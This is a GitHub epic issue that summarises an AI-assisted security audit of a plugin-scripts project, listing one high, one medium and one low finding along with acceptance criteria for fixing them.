Skip to content

[Security Audit] Security hardening for plugin-scripts #388

Open
Epic
0 of 1 issue completed
Open
[Security Audit] Security hardening for plugin-scripts#388
Epic
0 of 1 issue completed
Labels
area/pluginPlugin-related issue or feature requestkind/securitySecurity-related issue

Description

@fdelbrayelle
fdelbrayelle
opened on Jun 30, 2026

Summary

Security audit of plugin-scripts against OWASP Top 10 (2025), CWE Top 25, OWASP ASVS Level 1, Kestra Plugin-Specific Threats (KPS), and Supply Chain Dependency Hygiene.

Audit date: 2026-06-30
Auditor: AI-assisted scan (kestra-plugin-security-auditing skill)
Scope: 19 submodules, 58 Java source files

Findings Overview

HIGH (tracked as sub-issues)

  • HIGH-001 — Remote installer script executed without integrity verification (PythonDependenciesResolver.java:292)

MEDIUM (no sub-issue — remediate during next sprint)

  • MEDIUM-001 — User-controlled regex compiled without ReDoS timeout in 7 of 9 trigger implementations (Shell, Python, Node, Go triggers)

LOW (no sub-issue — address opportunistically)

  • LOW-001 — Process exception messages forwarded into thrown exceptions without filtering (6 locations in PackageManagerType.java and PythonDependenciesResolver.java)

Acceptance Criteria

  • All CRITICAL sub-issues resolved and merged (none in this audit)
  • All HIGH sub-issues resolved and merged
  • MEDIUM/LOW findings triaged: accepted, deferred with rationale, or fixed
  • Follow-up scan scheduled within 90 days

Standards

View as Artifact

Metadata

Metadata

Assignees

No one assigned

    Labels

    area/pluginPlugin-related issue or feature requestkind/securitySecurity-related issue

    Type

    Epic

    Fields

    No fields configured for Epic.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions